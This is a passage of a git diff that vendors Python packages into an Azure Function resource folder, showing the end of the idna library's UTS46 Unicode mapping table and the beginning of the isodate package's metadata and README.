(0x1F13E, 'M', 'o'), + (0x1F13F, 'M', 'p'), + (0x1F140, 'M', 'q'), + (0x1F141, 'M', 'r'), + (0x1F142, 'M', 's'), + (0x1F143, 'M', 't'), + ] + +def _seg_74() -> List[Union[Tuple[int, str], Tuple[int, str, str]]]: + return [ + (0x1F144, 'M', 'u'), + (0x1F145, 'M', 'v'), + (0x1F146, 'M', 'w'), + (0x1F147, 'M', 'x'), + (0x1F148, 'M', 'y'), + (0x1F149, 'M', 'z'), + (0x1F14A, 'M', 'hv'), + (0x1F14B, 'M', 'mv'), + (0x1F14C, 'M', 'sd'), + (0x1F14D, 'M', 'ss'), + (0x1F14E, 'M', 'ppv'), + (0x1F14F, 'M', 'wc'), + (0x1F150, 'V'), + (0x1F16A, 'M', 'mc'), + (0x1F16B, 'M', 'md'), + (0x1F16C, 'M', 'mr'), + (0x1F16D, 'V'), + (0x1F190, 'M', 'dj'), + (0x1F191, 'V'), + (0x1F1AE, 'X'), + (0x1F1E6, 'V'), + (0x1F200, 'M', 'ほか'), + (0x1F201, 'M', 'ココ'), + (0x1F202, 'M', 'サ'), + (0x1F203, 'X'), + (0x1F210, 'M', '手'), + (0x1F211, 'M', '字'), + (0x1F212, 'M', '双'), + (0x1F213, 'M', 'デ'), + (0x1F214, 'M', '二'), + (0x1F215, 'M', '多'), + (0x1F216, 'M', '解'), + (0x1F217, 'M', '天'), + (0x1F218, 'M', '交'), + (0x1F219, 'M', '映'), + (0x1F21A, 'M', '無'), + (0x1F21B, 'M', '料'), + (0x1F21C, 'M', '前'), + (0x1F21D, 'M', '後'), + (0x1F21E, 'M', '再'), + (0x1F21F, 'M', '新'), + (0x1F220, 'M', '初'), + (0x1F221, 'M', '終'), + (0x1F222, 'M', '生'), + (0x1F223, 'M', '販'), + (0x1F224, 'M', '声'), + (0x1F225, 'M', '吹'), + (0x1F226, 'M', '演'), + (0x1F227, 'M', '投'), + (0x1F228, 'M', '捕'), + (0x1F229, 'M', '一'), + (0x1F22A, 'M', '三'), + (0x1F22B, 'M', '遊'), + (0x1F22C, 'M', '左'), + (0x1F22D, 'M', '中'), + (0x1F22E, 'M', '右'), + (0x1F22F, 'M', '指'), + (0x1F230, 'M', '走'), + (0x1F231, 'M', '打'), + (0x1F232, 'M', '禁'), + (0x1F233, 'M', '空'), + (0x1F234, 'M', '合'), + (0x1F235, 'M', '満'), + (0x1F236, 'M', '有'), + (0x1F237, 'M', '月'), + (0x1F238, 'M', '申'), + (0x1F239, 'M', '割'), + (0x1F23A, 'M', '営'), + (0x1F23B, 'M', '配'), + (0x1F23C, 'X'), + (0x1F240, 'M', '〔本〕'), + (0x1F241, 'M', '〔三〕'), + (0x1F242, 'M', '〔二〕'), + (0x1F243, 'M', '〔安〕'), + (0x1F244, 'M', '〔点〕'), + (0x1F245, 'M', '〔打〕'), + (0x1F246, 'M', '〔盗〕'), + (0x1F247, 'M', '〔勝〕'), + (0x1F248, 'M', '〔敗〕'), + (0x1F249, 'X'), + (0x1F250, 'M', '得'), + (0x1F251, 'M', '可'), + (0x1F252, 'X'), + (0x1F260, 'V'), + (0x1F266, 'X'), + (0x1F300, 'V'), + (0x1F6D8, 'X'), + (0x1F6DD, 'V'), + (0x1F6ED, 'X'), + (0x1F6F0, 'V'), + (0x1F6FD, 'X'), + (0x1F700, 'V'), + (0x1F774, 'X'), + (0x1F780, 'V'), + (0x1F7D9, 'X'), + (0x1F7E0, 'V'), + (0x1F7EC, 'X'), + (0x1F7F0, 'V'), + (0x1F7F1, 'X'), + (0x1F800, 'V'), + ] + +def _seg_75() -> List[Union[Tuple[int, str], Tuple[int, str, str]]]: + return [ + (0x1F80C, 'X'), + (0x1F810, 'V'), + (0x1F848, 'X'), + (0x1F850, 'V'), + (0x1F85A, 'X'), + (0x1F860, 'V'), + (0x1F888, 'X'), + (0x1F890, 'V'), + (0x1F8AE, 'X'), + (0x1F8B0, 'V'), + (0x1F8B2, 'X'), + (0x1F900, 'V'), + (0x1FA54, 'X'), + (0x1FA60, 'V'), + (0x1FA6E, 'X'), + (0x1FA70, 'V'), + (0x1FA75, 'X'), + (0x1FA78, 'V'), + (0x1FA7D, 'X'), + (0x1FA80, 'V'), + (0x1FA87, 'X'), + (0x1FA90, 'V'), + (0x1FAAD, 'X'), + (0x1FAB0, 'V'), + (0x1FABB, 'X'), + (0x1FAC0, 'V'), + (0x1FAC6, 'X'), + (0x1FAD0, 'V'), + (0x1FADA, 'X'), + (0x1FAE0, 'V'), + (0x1FAE8, 'X'), + (0x1FAF0, 'V'), + (0x1FAF7, 'X'), + (0x1FB00, 'V'), + (0x1FB93, 'X'), + (0x1FB94, 'V'), + (0x1FBCB, 'X'), + (0x1FBF0, 'M', '0'), + (0x1FBF1, 'M', '1'), + (0x1FBF2, 'M', '2'), + (0x1FBF3, 'M', '3'), + (0x1FBF4, 'M', '4'), + (0x1FBF5, 'M', '5'), + (0x1FBF6, 'M', '6'), + (0x1FBF7, 'M', '7'), + (0x1FBF8, 'M', '8'), + (0x1FBF9, 'M', '9'), + (0x1FBFA, 'X'), + (0x20000, 'V'), + (0x2A6E0, 'X'), + (0x2A700, 'V'), + (0x2B739, 'X'), + (0x2B740, 'V'), + (0x2B81E, 'X'), + (0x2B820, 'V'), + (0x2CEA2, 'X'), + (0x2CEB0, 'V'), + (0x2EBE1, 'X'), + (0x2F800, 'M', '丽'), + (0x2F801, 'M', '丸'), + (0x2F802, 'M', '乁'), + (0x2F803, 'M', '𠄢'), + (0x2F804, 'M', '你'), + (0x2F805, 'M', '侮'), + (0x2F806, 'M', '侻'), + (0x2F807, 'M', '倂'), + (0x2F808, 'M', '偺'), + (0x2F809, 'M', '備'), + (0x2F80A, 'M', '僧'), + (0x2F80B, 'M', '像'), + (0x2F80C, 'M', '㒞'), + (0x2F80D, 'M', '𠘺'), + (0x2F80E, 'M', '免'), + (0x2F80F, 'M', '兔'), + (0x2F810, 'M', '兤'), + (0x2F811, 'M', '具'), + (0x2F812, 'M', '𠔜'), + (0x2F813, 'M', '㒹'), + (0x2F814, 'M', '內'), + (0x2F815, 'M', '再'), + (0x2F816, 'M', '𠕋'), + (0x2F817, 'M', '冗'), + (0x2F818, 'M', '冤'), + (0x2F819, 'M', '仌'), + (0x2F81A, 'M', '冬'), + (0x2F81B, 'M', '况'), + (0x2F81C, 'M', '𩇟'), + (0x2F81D, 'M', '凵'), + (0x2F81E, 'M', '刃'), + (0x2F81F, 'M', '㓟'), + (0x2F820, 'M', '刻'), + (0x2F821, 'M', '剆'), + (0x2F822, 'M', '割'), + (0x2F823, 'M', '剷'), + (0x2F824, 'M', '㔕'), + (0x2F825, 'M', '勇'), + (0x2F826, 'M', '勉'), + (0x2F827, 'M', '勤'), + (0x2F828, 'M', '勺'), + (0x2F829, 'M', '包'), + ] + +def _seg_76() -> List[Union[Tuple[int, str], Tuple[int, str, str]]]: + return [ + (0x2F82A, 'M', '匆'), + (0x2F82B, 'M', '北'), + (0x2F82C, 'M', '卉'), + (0x2F82D, 'M', '卑'), + (0x2F82E, 'M', '博'), + (0x2F82F, 'M', '即'), + (0x2F830, 'M', '卽'), + (0x2F831, 'M', '卿'), + (0x2F834, 'M', '𠨬'), + (0x2F835, 'M', '灰'), + (0x2F836, 'M', '及'), + (0x2F837, 'M', '叟'), + (0x2F838, 'M', '𠭣'), + (0x2F839, 'M', '叫'), + (0x2F83A, 'M', '叱'), + (0x2F83B, 'M', '吆'), + (0x2F83C, 'M', '咞'), + (0x2F83D, 'M', '吸'), + (0x2F83E, 'M', '呈'), + (0x2F83F, 'M', '周'), + (0x2F840, 'M', '咢'), + (0x2F841, 'M', '哶'), + (0x2F842, 'M', '唐'), + (0x2F843, 'M', '啓'), + (0x2F844, 'M', '啣'), + (0x2F845, 'M', '善'), + (0x2F847, 'M', '喙'), + (0x2F848, 'M', '喫'), + (0x2F849, 'M', '喳'), + (0x2F84A, 'M', '嗂'), + (0x2F84B, 'M', '圖'), + (0x2F84C, 'M', '嘆'), + (0x2F84D, 'M', '圗'), + (0x2F84E, 'M', '噑'), + (0x2F84F, 'M', '噴'), + (0x2F850, 'M', '切'), + (0x2F851, 'M', '壮'), + (0x2F852, 'M', '城'), + (0x2F853, 'M', '埴'), + (0x2F854, 'M', '堍'), + (0x2F855, 'M', '型'), + (0x2F856, 'M', '堲'), + (0x2F857, 'M', '報'), + (0x2F858, 'M', '墬'), + (0x2F859, 'M', '𡓤'), + (0x2F85A, 'M', '売'), + (0x2F85B, 'M', '壷'), + (0x2F85C, 'M', '夆'), + (0x2F85D, 'M', '多'), + (0x2F85E, 'M', '夢'), + (0x2F85F, 'M', '奢'), + (0x2F860, 'M', '𡚨'), + (0x2F861, 'M', '𡛪'), + (0x2F862, 'M', '姬'), + (0x2F863, 'M', '娛'), + (0x2F864, 'M', '娧'), + (0x2F865, 'M', '姘'), + (0x2F866, 'M', '婦'), + (0x2F867, 'M', '㛮'), + (0x2F868, 'X'), + (0x2F869, 'M', '嬈'), + (0x2F86A, 'M', '嬾'), + (0x2F86C, 'M', '𡧈'), + (0x2F86D, 'M', '寃'), + (0x2F86E, 'M', '寘'), + (0x2F86F, 'M', '寧'), + (0x2F870, 'M', '寳'), + (0x2F871, 'M', '𡬘'), + (0x2F872, 'M', '寿'), + (0x2F873, 'M', '将'), + (0x2F874, 'X'), + (0x2F875, 'M', '尢'), + (0x2F876, 'M', '㞁'), + (0x2F877, 'M', '屠'), + (0x2F878, 'M', '屮'), + (0x2F879, 'M', '峀'), + (0x2F87A, 'M', '岍'), + (0x2F87B, 'M', '𡷤'), + (0x2F87C, 'M', '嵃'), + (0x2F87D, 'M', '𡷦'), + (0x2F87E, 'M', '嵮'), + (0x2F87F, 'M', '嵫'), + (0x2F880, 'M', '嵼'), + (0x2F881, 'M', '巡'), + (0x2F882, 'M', '巢'), + (0x2F883, 'M', '㠯'), + (0x2F884, 'M', '巽'), + (0x2F885, 'M', '帨'), + (0x2F886, 'M', '帽'), + (0x2F887, 'M', '幩'), + (0x2F888, 'M', '㡢'), + (0x2F889, 'M', '𢆃'), + (0x2F88A, 'M', '㡼'), + (0x2F88B, 'M', '庰'), + (0x2F88C, 'M', '庳'), + (0x2F88D, 'M', '庶'), + (0x2F88E, 'M', '廊'), + (0x2F88F, 'M', '𪎒'), + (0x2F890, 'M', '廾'), + (0x2F891, 'M', '𢌱'), + ] + +def _seg_77() -> List[Union[Tuple[int, str], Tuple[int, str, str]]]: + return [ + (0x2F893, 'M', '舁'), + (0x2F894, 'M', '弢'), + (0x2F896, 'M', '㣇'), + (0x2F897, 'M', '𣊸'), + (0x2F898, 'M', '𦇚'), + (0x2F899, 'M', '形'), + (0x2F89A, 'M', '彫'), + (0x2F89B, 'M', '㣣'), + (0x2F89C, 'M', '徚'), + (0x2F89D, 'M', '忍'), + (0x2F89E, 'M', '志'), + (0x2F89F, 'M', '忹'), + (0x2F8A0, 'M', '悁'), + (0x2F8A1, 'M', '㤺'), + (0x2F8A2, 'M', '㤜'), + (0x2F8A3, 'M', '悔'), + (0x2F8A4, 'M', '𢛔'), + (0x2F8A5, 'M', '惇'), + (0x2F8A6, 'M', '慈'), + (0x2F8A7, 'M', '慌'), + (0x2F8A8, 'M', '慎'), + (0x2F8A9, 'M', '慌'), + (0x2F8AA, 'M', '慺'), + (0x2F8AB, 'M', '憎'), + (0x2F8AC, 'M', '憲'), + (0x2F8AD, 'M', '憤'), + (0x2F8AE, 'M', '憯'), + (0x2F8AF, 'M', '懞'), + (0x2F8B0, 'M', '懲'), + (0x2F8B1, 'M', '懶'), + (0x2F8B2, 'M', '成'), + (0x2F8B3, 'M', '戛'), + (0x2F8B4, 'M', '扝'), + (0x2F8B5, 'M', '抱'), + (0x2F8B6, 'M', '拔'), + (0x2F8B7, 'M', '捐'), + (0x2F8B8, 'M', '𢬌'), + (0x2F8B9, 'M', '挽'), + (0x2F8BA, 'M', '拼'), + (0x2F8BB, 'M', '捨'), + (0x2F8BC, 'M', '掃'), + (0x2F8BD, 'M', '揤'), + (0x2F8BE, 'M', '𢯱'), + (0x2F8BF, 'M', '搢'), + (0x2F8C0, 'M', '揅'), + (0x2F8C1, 'M', '掩'), + (0x2F8C2, 'M', '㨮'), + (0x2F8C3, 'M', '摩'), + (0x2F8C4, 'M', '摾'), + (0x2F8C5, 'M', '撝'), + (0x2F8C6, 'M', '摷'), + (0x2F8C7, 'M', '㩬'), + (0x2F8C8, 'M', '敏'), + (0x2F8C9, 'M', '敬'), + (0x2F8CA, 'M', '𣀊'), + (0x2F8CB, 'M', '旣'), + (0x2F8CC, 'M', '書'), + (0x2F8CD, 'M', '晉'), + (0x2F8CE, 'M', '㬙'), + (0x2F8CF, 'M', '暑'), + (0x2F8D0, 'M', '㬈'), + (0x2F8D1, 'M', '㫤'), + (0x2F8D2, 'M', '冒'), + (0x2F8D3, 'M', '冕'), + (0x2F8D4, 'M', '最'), + (0x2F8D5, 'M', '暜'), + (0x2F8D6, 'M', '肭'), + (0x2F8D7, 'M', '䏙'), + (0x2F8D8, 'M', '朗'), + (0x2F8D9, 'M', '望'), + (0x2F8DA, 'M', '朡'), + (0x2F8DB, 'M', '杞'), + (0x2F8DC, 'M', '杓'), + (0x2F8DD, 'M', '𣏃'), + (0x2F8DE, 'M', '㭉'), + (0x2F8DF, 'M', '柺'), + (0x2F8E0, 'M', '枅'), + (0x2F8E1, 'M', '桒'), + (0x2F8E2, 'M', '梅'), + (0x2F8E3, 'M', '𣑭'), + (0x2F8E4, 'M', '梎'), + (0x2F8E5, 'M', '栟'), + (0x2F8E6, 'M', '椔'), + (0x2F8E7, 'M', '㮝'), + (0x2F8E8, 'M', '楂'), + (0x2F8E9, 'M', '榣'), + (0x2F8EA, 'M', '槪'), + (0x2F8EB, 'M', '檨'), + (0x2F8EC, 'M', '𣚣'), + (0x2F8ED, 'M', '櫛'), + (0x2F8EE, 'M', '㰘'), + (0x2F8EF, 'M', '次'), + (0x2F8F0, 'M', '𣢧'), + (0x2F8F1, 'M', '歔'), + (0x2F8F2, 'M', '㱎'), + (0x2F8F3, 'M', '歲'), + (0x2F8F4, 'M', '殟'), + (0x2F8F5, 'M', '殺'), + (0x2F8F6, 'M', '殻'), + (0x2F8F7, 'M', '𣪍'), + ] + +def _seg_78() -> List[Union[Tuple[int, str], Tuple[int, str, str]]]: + return [ + (0x2F8F8, 'M', '𡴋'), + (0x2F8F9, 'M', '𣫺'), + (0x2F8FA, 'M', '汎'), + (0x2F8FB, 'M', '𣲼'), + (0x2F8FC, 'M', '沿'), + (0x2F8FD, 'M', '泍'), + (0x2F8FE, 'M', '汧'), + (0x2F8FF, 'M', '洖'), + (0x2F900, 'M', '派'), + (0x2F901, 'M', '海'), + (0x2F902, 'M', '流'), + (0x2F903, 'M', '浩'), + (0x2F904, 'M', '浸'), + (0x2F905, 'M', '涅'), + (0x2F906, 'M', '𣴞'), + (0x2F907, 'M', '洴'), + (0x2F908, 'M', '港'), + (0x2F909, 'M', '湮'), + (0x2F90A, 'M', '㴳'), + (0x2F90B, 'M', '滋'), + (0x2F90C, 'M', '滇'), + (0x2F90D, 'M', '𣻑'), + (0x2F90E, 'M', '淹'), + (0x2F90F, 'M', '潮'), + (0x2F910, 'M', '𣽞'), + (0x2F911, 'M', '𣾎'), + (0x2F912, 'M', '濆'), + (0x2F913, 'M', '瀹'), + (0x2F914, 'M', '瀞'), + (0x2F915, 'M', '瀛'), + (0x2F916, 'M', '㶖'), + (0x2F917, 'M', '灊'), + (0x2F918, 'M', '災'), + (0x2F919, 'M', '灷'), + (0x2F91A, 'M', '炭'), + (0x2F91B, 'M', '𠔥'), + (0x2F91C, 'M', '煅'), + (0x2F91D, 'M', '𤉣'), + (0x2F91E, 'M', '熜'), + (0x2F91F, 'X'), + (0x2F920, 'M', '爨'), + (0x2F921, 'M', '爵'), + (0x2F922, 'M', '牐'), + (0x2F923, 'M', '𤘈'), + (0x2F924, 'M', '犀'), + (0x2F925, 'M', '犕'), + (0x2F926, 'M', '𤜵'), + (0x2F927, 'M', '𤠔'), + (0x2F928, 'M', '獺'), + (0x2F929, 'M', '王'), + (0x2F92A, 'M', '㺬'), + (0x2F92B, 'M', '玥'), + (0x2F92C, 'M', '㺸'), + (0x2F92E, 'M', '瑇'), + (0x2F92F, 'M', '瑜'), + (0x2F930, 'M', '瑱'), + (0x2F931, 'M', '璅'), + (0x2F932, 'M', '瓊'), + (0x2F933, 'M', '㼛'), + (0x2F934, 'M', '甤'), + (0x2F935, 'M', '𤰶'), + (0x2F936, 'M', '甾'), + (0x2F937, 'M', '𤲒'), + (0x2F938, 'M', '異'), + (0x2F939, 'M', '𢆟'), + (0x2F93A, 'M', '瘐'), + (0x2F93B, 'M', '𤾡'), + (0x2F93C, 'M', '𤾸'), + (0x2F93D, 'M', '𥁄'), + (0x2F93E, 'M', '㿼'), + (0x2F93F, 'M', '䀈'), + (0x2F940, 'M', '直'), + (0x2F941, 'M', '𥃳'), + (0x2F942, 'M', '𥃲'), + (0x2F943, 'M', '𥄙'), + (0x2F944, 'M', '𥄳'), + (0x2F945, 'M', '眞'), + (0x2F946, 'M', '真'), + (0x2F948, 'M', '睊'), + (0x2F949, 'M', '䀹'), + (0x2F94A, 'M', '瞋'), + (0x2F94B, 'M', '䁆'), + (0x2F94C, 'M', '䂖'), + (0x2F94D, 'M', '𥐝'), + (0x2F94E, 'M', '硎'), + (0x2F94F, 'M', '碌'), + (0x2F950, 'M', '磌'), + (0x2F951, 'M', '䃣'), + (0x2F952, 'M', '𥘦'), + (0x2F953, 'M', '祖'), + (0x2F954, 'M', '𥚚'), + (0x2F955, 'M', '𥛅'), + (0x2F956, 'M', '福'), + (0x2F957, 'M', '秫'), + (0x2F958, 'M', '䄯'), + (0x2F959, 'M', '穀'), + (0x2F95A, 'M', '穊'), + (0x2F95B, 'M', '穏'), + (0x2F95C, 'M', '𥥼'), + (0x2F95D, 'M', '𥪧'), + ] + +def _seg_79() -> List[Union[Tuple[int, str], Tuple[int, str, str]]]: + return [ + (0x2F95F, 'X'), + (0x2F960, 'M', '䈂'), + (0x2F961, 'M', '𥮫'), + (0x2F962, 'M', '篆'), + (0x2F963, 'M', '築'), + (0x2F964, 'M', '䈧'), + (0x2F965, 'M', '𥲀'), + (0x2F966, 'M', '糒'), + (0x2F967, 'M', '䊠'), + (0x2F968, 'M', '糨'), + (0x2F969, 'M', '糣'), + (0x2F96A, 'M', '紀'), + (0x2F96B, 'M', '𥾆'), + (0x2F96C, 'M', '絣'), + (0x2F96D, 'M', '䌁'), + (0x2F96E, 'M', '緇'), + (0x2F96F, 'M', '縂'), + (0x2F970, 'M', '繅'), + (0x2F971, 'M', '䌴'), + (0x2F972, 'M', '𦈨'), + (0x2F973, 'M', '𦉇'), + (0x2F974, 'M', '䍙'), + (0x2F975, 'M', '𦋙'), + (0x2F976, 'M', '罺'), + (0x2F977, 'M', '𦌾'), + (0x2F978, 'M', '羕'), + (0x2F979, 'M', '翺'), + (0x2F97A, 'M', '者'), + (0x2F97B, 'M', '𦓚'), + (0x2F97C, 'M', '𦔣'), + (0x2F97D, 'M', '聠'), + (0x2F97E, 'M', '𦖨'), + (0x2F97F, 'M', '聰'), + (0x2F980, 'M', '𣍟'), + (0x2F981, 'M', '䏕'), + (0x2F982, 'M', '育'), + (0x2F983, 'M', '脃'), + (0x2F984, 'M', '䐋'), + (0x2F985, 'M', '脾'), + (0x2F986, 'M', '媵'), + (0x2F987, 'M', '𦞧'), + (0x2F988, 'M', '𦞵'), + (0x2F989, 'M', '𣎓'), + (0x2F98A, 'M', '𣎜'), + (0x2F98B, 'M', '舁'), + (0x2F98C, 'M', '舄'), + (0x2F98D, 'M', '辞'), + (0x2F98E, 'M', '䑫'), + (0x2F98F, 'M', '芑'), + (0x2F990, 'M', '芋'), + (0x2F991, 'M', '芝'), + (0x2F992, 'M', '劳'), + (0x2F993, 'M', '花'), + (0x2F994, 'M', '芳'), + (0x2F995, 'M', '芽'), + (0x2F996, 'M', '苦'), + (0x2F997, 'M', '𦬼'), + (0x2F998, 'M', '若'), + (0x2F999, 'M', '茝'), + (0x2F99A, 'M', '荣'), + (0x2F99B, 'M', '莭'), + (0x2F99C, 'M', '茣'), + (0x2F99D, 'M', '莽'), + (0x2F99E, 'M', '菧'), + (0x2F99F, 'M', '著'), + (0x2F9A0, 'M', '荓'), + (0x2F9A1, 'M', '菊'), + (0x2F9A2, 'M', '菌'), + (0x2F9A3, 'M', '菜'), + (0x2F9A4, 'M', '𦰶'), + (0x2F9A5, 'M', '𦵫'), + (0x2F9A6, 'M', '𦳕'), + (0x2F9A7, 'M', '䔫'), + (0x2F9A8, 'M', '蓱'), + (0x2F9A9, 'M', '蓳'), + (0x2F9AA, 'M', '蔖'), + (0x2F9AB, 'M', '𧏊'), + (0x2F9AC, 'M', '蕤'), + (0x2F9AD, 'M', '𦼬'), + (0x2F9AE, 'M', '䕝'), + (0x2F9AF, 'M', '䕡'), + (0x2F9B0, 'M', '𦾱'), + (0x2F9B1, 'M', '𧃒'), + (0x2F9B2, 'M', '䕫'), + (0x2F9B3, 'M', '虐'), + (0x2F9B4, 'M', '虜'), + (0x2F9B5, 'M', '虧'), + (0x2F9B6, 'M', '虩'), + (0x2F9B7, 'M', '蚩'), + (0x2F9B8, 'M', '蚈'), + (0x2F9B9, 'M', '蜎'), + (0x2F9BA, 'M', '蛢'), + (0x2F9BB, 'M', '蝹'), + (0x2F9BC, 'M', '蜨'), + (0x2F9BD, 'M', '蝫'), + (0x2F9BE, 'M', '螆'), + (0x2F9BF, 'X'), + (0x2F9C0, 'M', '蟡'), + (0x2F9C1, 'M', '蠁'), + (0x2F9C2, 'M', '䗹'), + ] + +def _seg_80() -> List[Union[Tuple[int, str], Tuple[int, str, str]]]: + return [ + (0x2F9C3, 'M', '衠'), + (0x2F9C4, 'M', '衣'), + (0x2F9C5, 'M', '𧙧'), + (0x2F9C6, 'M', '裗'), + (0x2F9C7, 'M', '裞'), + (0x2F9C8, 'M', '䘵'), + (0x2F9C9, 'M', '裺'), + (0x2F9CA, 'M', '㒻'), + (0x2F9CB, 'M', '𧢮'), + (0x2F9CC, 'M', '𧥦'), + (0x2F9CD, 'M', '䚾'), + (0x2F9CE, 'M', '䛇'), + (0x2F9CF, 'M', '誠'), + (0x2F9D0, 'M', '諭'), + (0x2F9D1, 'M', '變'), + (0x2F9D2, 'M', '豕'), + (0x2F9D3, 'M', '𧲨'), + (0x2F9D4, 'M', '貫'), + (0x2F9D5, 'M', '賁'), + (0x2F9D6, 'M', '贛'), + (0x2F9D7, 'M', '起'), + (0x2F9D8, 'M', '𧼯'), + (0x2F9D9, 'M', '𠠄'), + (0x2F9DA, 'M', '跋'), + (0x2F9DB, 'M', '趼'), + (0x2F9DC, 'M', '跰'), + (0x2F9DD, 'M', '𠣞'), + (0x2F9DE, 'M', '軔'), + (0x2F9DF, 'M', '輸'), + (0x2F9E0, 'M', '𨗒'), + (0x2F9E1, 'M', '𨗭'), + (0x2F9E2, 'M', '邔'), + (0x2F9E3, 'M', '郱'), + (0x2F9E4, 'M', '鄑'), + (0x2F9E5, 'M', '𨜮'), + (0x2F9E6, 'M', '鄛'), + (0x2F9E7, 'M', '鈸'), + (0x2F9E8, 'M', '鋗'), + (0x2F9E9, 'M', '鋘'), + (0x2F9EA, 'M', '鉼'), + (0x2F9EB, 'M', '鏹'), + (0x2F9EC, 'M', '鐕'), + (0x2F9ED, 'M', '𨯺'), + (0x2F9EE, 'M', '開'), + (0x2F9EF, 'M', '䦕'), + (0x2F9F0, 'M', '閷'), + (0x2F9F1, 'M', '𨵷'), + (0x2F9F2, 'M', '䧦'), + (0x2F9F3, 'M', '雃'), + (0x2F9F4, 'M', '嶲'), + (0x2F9F5, 'M', '霣'), + (0x2F9F6, 'M', '𩅅'), + (0x2F9F7, 'M', '𩈚'), + (0x2F9F8, 'M', '䩮'), + (0x2F9F9, 'M', '䩶'), + (0x2F9FA, 'M', '韠'), + (0x2F9FB, 'M', '𩐊'), + (0x2F9FC, 'M', '䪲'), + (0x2F9FD, 'M', '𩒖'), + (0x2F9FE, 'M', '頋'), + (0x2FA00, 'M', '頩'), + (0x2FA01, 'M', '𩖶'), + (0x2FA02, 'M', '飢'), + (0x2FA03, 'M', '䬳'), + (0x2FA04, 'M', '餩'), + (0x2FA05, 'M', '馧'), + (0x2FA06, 'M', '駂'), + (0x2FA07, 'M', '駾'), + (0x2FA08, 'M', '䯎'), + (0x2FA09, 'M', '𩬰'), + (0x2FA0A, 'M', '鬒'), + (0x2FA0B, 'M', '鱀'), + (0x2FA0C, 'M', '鳽'), + (0x2FA0D, 'M', '䳎'), + (0x2FA0E, 'M', '䳭'), + (0x2FA0F, 'M', '鵧'), + (0x2FA10, 'M', '𪃎'), + (0x2FA11, 'M', '䳸'), + (0x2FA12, 'M', '𪄅'), + (0x2FA13, 'M', '𪈎'), + (0x2FA14, 'M', '𪊑'), + (0x2FA15, 'M', '麻'), + (0x2FA16, 'M', '䵖'), + (0x2FA17, 'M', '黹'), + (0x2FA18, 'M', '黾'), + (0x2FA19, 'M', '鼅'), + (0x2FA1A, 'M', '鼏'), + (0x2FA1B, 'M', '鼖'), + (0x2FA1C, 'M', '鼻'), + (0x2FA1D, 'M', '𪘀'), + (0x2FA1E, 'X'), + (0x30000, 'V'), + (0x3134B, 'X'), + (0xE0100, 'I'), + (0xE01F0, 'X'), + ] + +uts46data = tuple( + _seg_0() + + _seg_1() + + _seg_2() + + _seg_3() + + _seg_4() + + _seg_5() + + _seg_6() + + _seg_7() + + _seg_8() + + _seg_9() + + _seg_10() + + _seg_11() + + _seg_12() + + _seg_13() + + _seg_14() + + _seg_15() + + _seg_16() + + _seg_17() + + _seg_18() + + _seg_19() + + _seg_20() + + _seg_21() + + _seg_22() + + _seg_23() + + _seg_24() + + _seg_25() + + _seg_26() + + _seg_27() + + _seg_28() + + _seg_29() + + _seg_30() + + _seg_31() + + _seg_32() + + _seg_33() + + _seg_34() + + _seg_35() + + _seg_36() + + _seg_37() + + _seg_38() + + _seg_39() + + _seg_40() + + _seg_41() + + _seg_42() + + _seg_43() + + _seg_44() + + _seg_45() + + _seg_46() + + _seg_47() + + _seg_48() + + _seg_49() + + _seg_50() + + _seg_51() + + _seg_52() + + _seg_53() + + _seg_54() + + _seg_55() + + _seg_56() + + _seg_57() + + _seg_58() + + _seg_59() + + _seg_60() + + _seg_61() + + _seg_62() + + _seg_63() + + _seg_64() + + _seg_65() + + _seg_66() + + _seg_67() + + _seg_68() + + _seg_69() + + _seg_70() + + _seg_71() + + _seg_72() + + _seg_73() + + _seg_74() + + _seg_75() + + _seg_76() + + _seg_77() + + _seg_78() + + _seg_79() + + _seg_80() +) # type: Tuple[Union[Tuple[int, str], Tuple[int, str, str]], ...] diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/isodate-0.6.1.dist-info/INSTALLER b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/isodate-0.6.1.dist-info/INSTALLER new file mode 100644 index 0000000..4660be2 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/isodate-0.6.1.dist-info/INSTALLER @@ -0,0 +1 @@ +pip diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/isodate-0.6.1.dist-info/METADATA b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/isodate-0.6.1.dist-info/METADATA new file mode 100644 index 0000000..3a9f8f7 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/isodate-0.6.1.dist-info/METADATA @@ -0,0 +1,291 @@ +Metadata-Version: 2.1 +Name: isodate +Version: 0.6.1 +Summary: An ISO 8601 date/time/duration parser and formatter +Home-page: https://github.com/gweis/isodate/ +Author: Gerhard Weis +Author-email: gerhard.weis@proclos.com +License: BSD +Platform: UNKNOWN +Classifier: Development Status :: 4 - Beta +Classifier: Intended Audience :: Developers +Classifier: License :: OSI Approved :: BSD License +Classifier: Operating System :: OS Independent +Classifier: Programming Language :: Python +Classifier: Programming Language :: Python :: 2 +Classifier: Programming Language :: Python :: 2.7 +Classifier: Programming Language :: Python :: 3 +Classifier: Programming Language :: Python :: 3.6 +Classifier: Programming Language :: Python :: 3.7 +Classifier: Programming Language :: Python :: 3.8 +Classifier: Programming Language :: Python :: 3.9 +Classifier: Programming Language :: Python :: 3.10 +Classifier: Programming Language :: Python :: Implementation :: PyPy +Classifier: Topic :: Internet +Classifier: Topic :: Software Development :: Libraries :: Python Modules +Requires-Dist: six + + +ISO 8601 date/time parser +========================= + +.. image:: https://travis-ci.org/gweis/isodate.svg?branch=master + :target: https://travis-ci.org/gweis/isodate + :alt: Travis-CI +.. image:: https://coveralls.io/repos/gweis/isodate/badge.svg?branch=master + :target: https://coveralls.io/r/gweis/isodate?branch=master + :alt: Coveralls +.. image:: https://img.shields.io/pypi/v/isodate.svg + :target: https://pypi.python.org/pypi/isodate/ + :alt: Latest Version +.. image:: https://img.shields.io/pypi/l/isodate.svg + :target: https://pypi.python.org/pypi/isodate/ + :alt: License + + +This module implements ISO 8601 date, time and duration parsing. +The implementation follows ISO8601:2004 standard, and implements only +date/time representations mentioned in the standard. If something is not +mentioned there, then it is treated as non existent, and not as an allowed +option. + +For instance, ISO8601:2004 never mentions 2 digit years. So, it is not +intended by this module to support 2 digit years. (while it may still +be valid as ISO date, because it is not explicitly forbidden.) +Another example is, when no time zone information is given for a time, +then it should be interpreted as local time, and not UTC. + +As this module maps ISO 8601 dates/times to standard Python data types, like +*date*, *time*, *datetime* and *timedelta*, it is not possible to convert +all possible ISO 8601 dates/times. For instance, dates before 0001-01-01 are +not allowed by the Python *date* and *datetime* 